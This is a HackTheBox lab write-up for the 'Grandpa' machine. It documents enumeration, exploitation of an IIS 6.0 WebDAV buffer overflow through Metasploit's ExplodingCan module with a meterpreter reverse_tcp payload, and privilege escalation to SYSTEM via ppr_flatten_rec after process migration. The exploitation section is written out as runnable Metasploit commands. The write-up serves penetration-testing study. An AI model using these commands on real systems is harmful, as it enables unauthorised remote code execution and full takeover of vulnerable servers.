HacktheBox - Grandpa Writeup

09/12/2019

Zero to OSCP Hero Writeup #16 - Grandpa

Reconnaissance

1. Nmap Scan - Common Ports TCP Scan

Let's start with a TCP scan of the target ip address to determine which common ports are open and which services are running on those ports:

nmap -sC -sV -oA nmap/initial.tcp 10.10.10.14

  • -sC: Run the default nmap script scan to find potential vulnerabilities
  • -sV: Detect the service version
  • -oA: Output the result of the scan in all formats as nmap/initial.tcp

From the scan we can see that there is only one port open, port 80. We can also see mentions of WebDAV, which was vulnerable on the box, Granny... Lets see if there are any similiarities! 

2. Nmap Scan - All TCP Ports Scan

Okay, lets scan the entire TCP port range to confirm that there are no other ports open:

nmap -sC -sV -p- -oA nmap/full.tcp 10.10.10.14

  • -sC: Run the default nmap script scan to find potential vulnerabilities
  • -sV: Detect the service version
  • -p-: Run the nmap scan against all ports
  • -oA: Output the result of the scan in all formats as nmap/full.tcp

The full TCP scan confirmed that there are no additional ports open.

3. Nmap Scan - All UDP Ports Scan

We can do the same full port scan, but with the UDP ports:

nmap -sU -p- -oA nmap/full.udp 10.10.10.14

  • -sU: Run the scan against UDP ports
  • -p-: Run the nmap scan against all ports
  • -oA: Output the result of the scan in all formats as nmap/full.tcp

The full UDP scan confirmed that there are no additional ports open.

Enumerating Port 80

1. Browse to https://10.10.10.14

Again, exactly like the box Granny, we get an under contruction page. 

2. Find hidden directories - Gobuster 

Lets run gobuster and see if we can find any hidden directories of interest:

gobuster dir -u 10.10.10.14 -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt

As expected, there is a _private directory. Lets browse to it and see if we can get any information! 

3. Browse to https://10.10.10.14/_private

Okay so this is different from Granny, we do not get anything of interest from the directory. As we know WebDAV is on the machine, lets enumerate that instead... 

Enumerating WebDAV

1. DAVtest 

DAVTest tests WebDAV enabled servers by uploading test executable files, and then uploading files which allow for command execution or other actions directly on the target.

Lets run it! 

davtest -url https://10.10.10.14

Okay so it seems that the WebDAV exploitation route isnt the one we should be going down as we are unable to upload any files to the server, meaning we cannot exploit it. 

Enumerating IIS Version

As WebDAV is not exploitable, I checked the nmap output again and it shows that the machine is running IIS version 6.0. 

IIS Version 6.0 was released with Windows Server 2003, meaning it is most possibly vulnerable to exploitation. 

1. Checking for public exploits 

After a quick google, I came across a remote buffer overflow exploit, which can be found here.

The overflow allows remote attackers to execute arbitrary code via a long header beginning with "If: <https://" in a PROPFIND request. 

2. Create iis-buffer-overflow NSE Script

Before trying an exploit on the machine, I want to make sure it is vulnerable. To do this, I found an NSE script that will check for the remote BoF vulnerability on the machine.  

2.1 Copy contents of the online script

To create the NSE script, we need to copy the contents of this script

2.2 Create the NSE script file

We need to create the script file inside the nmap scripts directory: 

/usr/share/nmap/scripts

nano iis-buffer-overflow.nse 

2.3 Run the iis-buffer-overflow NSE script

Now that the script has been created, lets see if the machine is vulnerable to this exploit: 

nmap --script iis-buffer-overflow 10.10.10.14

Thats a Bingo! 

Now that we know the machine is vulnerable, lets now find a working exploit! 

Initial Foothold and Priv Esc - Root 

1. ExplodingCan IIS 6.0 WebDAV BoF Exploit

ExplodingCan was an NSA made exploit that exploits WebDAV and IIS 6.0, I found this github page that details how the exploit works with a python script. 

I also found out that there is a metasploit exploit for this too, which i had to use as my shells for the python script always failed with netcat and multi/handler. 

So to exploit the vulnerability, im going to use the metasploit method: 

1.1 Find the exploit

Lets use the metasploit search function tro find the correct exploit: 

search explodingcan

1.2 Configure the exploit 

Once we have selected the exploit, we need to configure it to work on the vulnerable machine. 

show options

So for the exploit to work, we need to set the RHOST IP address, Payload and LHOST and LPORT details: 

set rhosts 10.10.10.14

set payload windows/meterpreter/reverse_tcp 

set lhost 10.10.14.59

set lport 9002 

run 

Nice, the exploit worked and we now have a reverse tcp connection! 

We can now gather some system information:

sysinfo

2. Further Exploitation 

Although we are on the machine, we are still only running as nt authority\network service meaning we cannot access the user.txt flag which i assume is in the user Harry's directory. 

2.1 Local Exploit Suggester 

Im going to use the inbuilt metasploit port exploitation module, Local Exploit Suggester to find a route to either Harry or Administrator. 

run post/multi/recon/local_exploit_suggester 

3. Exploiting ppr_flatten_rec 

So the machine looks to be possibly vulnerable to a few exploits, but we will concentrate on the bottom exploit: ppr_flatten_rec 

use exploit/windows/local/ppr_flatten_rec 

set session 1

set lhost 10.10.14.59

set lport 9003 

run 

3.1 Timeout Errors 

I was experiencing timeout errors when trying to launch the exploit, this was due to the process we were currently running as was not suitable for the exploit.

3.2 Migrating Processes 

For the exploit to work, we need to migrate to a different process currently being ran as Network Service. Lets take a look at the running processes:

ps 

I am going to migrate to the 2244 process, davcdata.exe as it is being ran by Network Service. 

migrate 2244

3.3 Running the exploit again

Now that we have migrated to a new process, lets run the exploit again: 

And the exploit works, we get a new meterpreter session as SYSTEM! 

4. Grab the user and root flags 

Now that we are SYSTEM, we can grab both of the flags: 

user.txt:

root.txt: 

Conclusion

This machine was a nightmare to root, not in terms of difficulty but exploits that should work but didn't, migrating to a different process took 4 box resets and many meterpreter sessions! 

Dissapointed to have used metasploit but it was taking far too long to get the box rooted manually. 

Thanks for reading, Next up is Box #17 - Sense!